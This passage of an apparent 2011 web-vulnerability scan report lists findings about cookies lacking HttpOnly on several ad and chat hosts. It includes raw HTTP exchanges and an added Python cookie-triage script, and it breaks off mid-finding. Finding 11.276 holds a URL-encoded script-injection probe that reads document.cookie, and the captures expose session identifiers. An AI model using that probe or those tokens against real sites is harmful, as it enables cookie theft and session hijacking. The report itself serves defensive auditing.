Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickSiteContainerID_5296924=Secondary1; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 28 Jan 2011 14:06:36 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924
Location: http://base.liveperson.net/hc/5296924/?cmd=file&file=visitorWantsToChat&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 0


11.274. https://base.liveperson.net/hc/5296924/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://base.liveperson.net
Path:   /hc/5296924/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The scanner's heuristic reports that the cookies do not appear to contain session tokens, which may reduce the risk associated with this issue; in this response, however, the HumanClickKEY and HumanClickCHATKEY values are reused verbatim in the sessionkey parameter of the Location header, so they act as chat-session identifiers and should be treated as such (HumanClickCHATKEY carries the Secure flag but still lacks HttpOnly, and LivePersonID is set twice with identical values). You should review the contents of the cookies to determine their function.

Request

GET /hc/5296924/?cmd=file&file=visitorWantsToChat&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales HTTP/1.1
Host: base.liveperson.net
Connection: keep-alive
Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickSiteContainerID_5296924=Secondary1; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 28 Jan 2011 14:16:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-16101423669632-1296224193:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 14:16:33 GMT; path=/hc/5296924; domain=.liveperson.net
Set-Cookie: HumanClickKEY=1417917221691646769; path=/hc/5296924
Set-Cookie: HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924
Set-Cookie: LivePersonID=-16101423669632-1296224193:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 14:16:33 GMT; path=/hc/5296924; domain=.liveperson.net
Set-Cookie: HumanClickCHATKEY=7678006185736106283; path=/hc/5296924; secure
Location: https://base.liveperson.net/hc/5296924/?cmd=file&file=chatFrame&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales&sessionkey=H1417917221691646769-7678006185736106283K15949656
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 0


11.275. https://base.liveperson.net/hc/5296924/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://base.liveperson.net
Path:   /hc/5296924/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/5296924/?lpCallId=1296223666173-668&lpjson=2&cmd=visitorEvents&site=5296924&sessionkey=H6680227135865200365-3761611791040242971K15949386&se=0 HTTP/1.1
Host: base.liveperson.net
Connection: keep-alive
Referer: https://base.liveperson.net/hc/5296924/?cmd=file&file=chatFrame&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales&sessionkey=H6680227135865200365-3761611791040242971K15949386
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickCHATKEY=3761611791040242971; HumanClickSiteContainerID_5296924=primary; LPit=true; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:06:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LPit=false; path=/hc/5296924
Set-Cookie: HumanClickSiteContainerID_5296924=Master; path=/hc/5296924
Set-Cookie: LivePersonID=-16101423669632-1296223154:1296223611:-1:-1:-1; expires=Sat, 28-Jan-2012 14:06:54 GMT; path=/hc/5296924; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 28 Jan 2011 14:06:54 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 893

lpConnLib.Process({"ResultSet": {"lpCallId":"1296223666173-668","lpCallConfirm":"","lpData":[{"eSeq":0,"params":["noChatSession","Chat session has ended. Please close this window and click the chat bu
...[SNIP]...
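An added triage script for findings 11.274 and 11.275 (example code written for this report, not part of the CloudScan/Burp scanner or of LivePerson's code): it parses the Set-Cookie headers of a raw response, flags missing HttpOnly, missing Secure on HTTPS responses and duplicate Set-Cookie lines, and checks whether any issued cookie value is echoed into the Location header, which is how HumanClickKEY and HumanClickCHATKEY turn up in the sessionkey parameter above. The session-name pattern is an assumption of ours, not the scanner's heuristic; the embedded sample is the 11.274 response copied from this report with the Location shortened.

```python
"""Triage Set-Cookie headers in a raw HTTP response (added example; not the
scanner's or LivePerson's code). Flags missing HttpOnly, missing Secure over
HTTPS, duplicate Set-Cookie lines and cookie values echoed into Location."""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass

# Assumption (ours, not the scanner's): names matching this usually carry a
# session or authentication token.
SESSION_NAME_RE = re.compile(r"session|sess|key|token|auth|sid", re.IGNORECASE)
MIN_VALUE_LEN = 8  # ignore short values when checking for echo into Location


@dataclass
class Cookie:
    name: str
    value: str
    attrs: dict[str, str | bool]  # lower-cased attribute -> value, True for flags

    @property
    def httponly(self) -> bool:
        return "httponly" in self.attrs

    @property
    def secure(self) -> bool:
        return "secure" in self.attrs


def parse_set_cookie(header_value: str) -> Cookie:
    """Parse one Set-Cookie value of the form 'name=value; attr=val; flag'."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: dict[str, str | bool] = {}
    for part in parts[1:]:
        if part:
            key, _, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip() if val else True
    return Cookie(name.strip(), value.strip(), attrs)


def headers(raw_response: str) -> list[tuple[str, str]]:
    """(lower-cased name, value) pairs from the header block, status line skipped."""
    head = re.split(r"\r?\n\r?\n", raw_response, maxsplit=1)[0]
    pairs = []
    for line in head.splitlines()[1:]:
        key, sep, val = line.partition(":")
        if sep:
            pairs.append((key.strip().lower(), val.strip()))
    return pairs


def cookie_values_in_location(raw_response: str) -> set[str]:
    """Names of issued cookies whose value reappears inside the Location header."""
    hdrs = headers(raw_response)
    location = next((v for k, v in hdrs if k == "location"), "")
    issued = (parse_set_cookie(v) for k, v in hdrs if k == "set-cookie")
    return {c.name for c in issued
            if len(c.value) >= MIN_VALUE_LEN and c.value in location}


def triage(raw_response: str, over_https: bool) -> list[dict]:
    """One record per Set-Cookie line, with the points a reviewer should check."""
    issued = [parse_set_cookie(v) for k, v in headers(raw_response) if k == "set-cookie"]
    counts = Counter(c.name for c in issued)
    echoed = cookie_values_in_location(raw_response)
    records = []
    for c in issued:
        issues = []
        if not c.httponly:
            issues.append("missing HttpOnly")
        if over_https and not c.secure:
            issues.append("missing Secure")
        if counts[c.name] > 1:
            issues.append("duplicate Set-Cookie")
        if c.name in echoed:
            issues.append("value echoed in Location")
        records.append({
            "name": c.name,
            "issues": issues,
            # Either signal means the "no session token" note should not be trusted.
            "session_like": bool(SESSION_NAME_RE.search(c.name)) or c.name in echoed,
        })
    return records


# Constructed sample: the 11.274 response above, with the Location shortened.
SAMPLE_RESPONSE = "\r\n".join([
    "HTTP/1.1 302 Moved Temporarily",
    "Set-Cookie: LivePersonID=-16101423669632-1296224193:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 14:16:33 GMT; path=/hc/5296924; domain=.liveperson.net",
    "Set-Cookie: HumanClickKEY=1417917221691646769; path=/hc/5296924",
    "Set-Cookie: HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924",
    "Set-Cookie: LivePersonID=-16101423669632-1296224193:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 14:16:33 GMT; path=/hc/5296924; domain=.liveperson.net",
    "Set-Cookie: HumanClickCHATKEY=7678006185736106283; path=/hc/5296924; secure",
    "Location: https://base.liveperson.net/hc/5296924/?cmd=file&file=chatFrame&site=5296924&sessionkey=H1417917221691646769-7678006185736106283K15949656",
    "Content-Length: 0", "", "",
])

if __name__ == "__main__":
    for rec in triage(SAMPLE_RESPONSE, over_https=True):
        flag = "SESSION?" if rec["session_like"] else "        "
        print(f"{flag} {rec['name']:<36} {', '.join(rec['issues']) or 'ok'}")
```

Run it as a script to print one line per issued cookie. The scheme is passed in by the caller (over_https) because a raw response does not record whether it arrived over TLS, and the Secure check only makes sense for HTTPS responses.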

11.276. https://base.liveperson.net/hc/5296924/5296924bff27%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e8465f0f4edd/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://base.liveperson.net
Path:   /hc/5296924/5296924bff27%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e8465f0f4edd/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/5296924/5296924bff27%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e8465f0f4edd/?cmd=file&file=visitorWantsToTalk&site=5296924&voiceMethod=esc HTTP/1.1
Host: base.liveperson.net
Connection: keep-alive
Referer: http://burp/show/9
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; HumanClickCHATKEY=3761611791040242971; LPit=false; LivePersonID=-16101423669632-1296224208:-1:-1:-1:-1; HumanClickSiteContainerID_5296924=Master; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 15:05:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-16101423669632-1296227119:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 15:05:19 GMT; path=/hc/5296924; domain=.liveperson.net
Set-Cookie: HumanClickKEY=8955939450992135978; path=/hc/5296924
Set-Cookie: HumanClickSiteContainerID_5296924=Master; path=/hc/5296924
Set-Cookie: LivePersonID=-16101423669632-1296227119:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 15:05:19 GMT; path=/hc/5296924; domain=.liveperson.net
Content-Type: text/html;charset=UTF-8
Last-Modified: Fri, 28 Jan 2011 15:05:19 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 26936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN" xml:lang="EN">

<head>
<title>
...[SNIP]...

11.277. http://br.imlive.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (spvdr, ibr and BIGipServerlanguage.imlive.com in the response below; the ASP.NET_SessionId cookie in the same response is issued with HttpOnly and is not part of this finding). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=rzczlq3uuxqphzq12ovdaz45; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=rzczlq3uuxqphzq12ovdaz45; path=/; HttpOnly
Set-Cookie: spvdr=vd=646c9815-aa9c-4aef-98a9-a90044ab80e5&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:50 GMT; path=/
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:50 GMT
Connection: close
Content-Length: 18208
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...

11.278. http://br.imlive.com/waccess/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (spvdr, ibr, pbr and BIGipServerlanguage.imlive.com in the response below; the ASP.NET_SessionId cookie in the same response is issued with HttpOnly and is not part of this finding). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=4msjt555stl42j45oorr4kmm; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=4msjt555stl42j45oorr4kmm; path=/; HttpOnly
Set-Cookie: spvdr=vd=cf49a80c-605c-401b-ba10-8fc2221aabca&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:52 GMT; path=/
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: pbr=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 14:16:52 GMT; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:51 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


11.279. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerSource.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; B3=89PS000000000GsZ7lgH0000000001sG89PT000000000RsZ852G0000000003sS7dNH0000000002sZ8cVQ0000000001sV83xP0000000001sF6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; A3=h5j3abLU07l00000Rh5iUabLQ07l00000Gf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; C4=; u3=1;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Fri, 29-Apr-2011 00:22:47 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Fri, 29-Apr-2011 00:22:47 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_=BlankImage
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 29 Jan 2011 05:22:47 GMT
Connection: close


11.280. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. Note also that the cookie name C_1348\ in this response appears to be derived from the request's Pos parameter (Pos=1348\), with the backslash carried through into the Set-Cookie header; request input reaching a response header is a separate concern from the missing HttpOnly flag and is worth checking for header injection on its own. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerSource.asp?FlightID=2137335&Page=&PluID=0&Pos=1348\ HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; B3=89PS000000000GsZ7lgH0000000001sG89PT000000000RsZ852G0000000003sS7dNH0000000002sZ8cVQ0000000001sV83xP0000000001sF6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; A3=h5j3abLU07l00000Rh5iUabLQ07l00000Gf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; C4=; u3=1;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingRes/Site-14437/Type-0/7af38356-1767-4fe6-b92f-837e34fde281.jpg
Server: Microsoft-IIS/7.5
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Fri, 29-Apr-2011 00:22:54 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=f+JvabEk02WG00002h5iUabLQ07l00000Gh5j3abPm07l00000Sgn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; expires=Fri, 29-Apr-2011 00:22:54 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7lgH0000000001sG89PS000000000GsZ89PT000000000Ss+852G0000000003sS7dNH0000000002sZ83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Fri, 29-Apr-2011 00:22:54 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Fri, 29-Apr-2011 00:22:54 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_1348\=4478147
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 29 Jan 2011 05:22:54 GMT
Connection: close


11.281. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1891435&PluID=0&w=728&h=90&ord=2784774291777236223&ucm=true&ncu=http://r.turn.com/r/formclick/id/_6wFyXaBpSZSDgIAZwABAA/url/ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG852G0000000003sS83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=f+JvabEl02WG00001gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7lgH0000000001sG852G0000000003sS7dNH0000000001sZ8cVQ0000000001sV83xP0000000001sF6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Fri, 28 Jan 2011 17:37:30 GMT
Connection: close
Content-Length: 3021

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

11.282. http://c.chango.com/collector/tag.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.chango.com
Path:   /collector/tag.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /collector/tag.js?_r=1296236606219&partnerId=oversee&siteID=NpAF2Tti8P0PKjSDdT3nmi2mz&logSearch=true&referrerURL=http%3A%2F%2Feztext.com%2F&q=mass%20texting HTTP/1.1
Host: c.chango.com
Proxy-Connection: keep-alive
Referer: http://searchportal.information.com/?o_id=131972&domainname=eztext.com&popunder=off&exit=off&adultfiler=off
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:43:35 GMT
Content-Type: text/javascript
Connection: close
Server: TornadoServer/1.1
Etag: "96e7c3afd30c151e7af6141145727255f5ec8c76"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: _t=21d8e954-2b06-11e0-8e8a-0025900870d2; Domain=chango.com; expires=Mon, 25 Jan 2021 17:43:35 GMT; Path=/
Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Thu, 28 Apr 2011 17:43:35 GMT; Path=/
Content-Length: 1303

(new Image()).src = 'http://tag.admeld.com/match?admeld_adprovider_id=333&external_user_id=' + encodeURIComponent('21d8e954-2b06-11e0-8e8a-0025900870d2');(new Image()).src = 'http://bid.openx.net/cm?p
...[SNIP]...

11.283. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

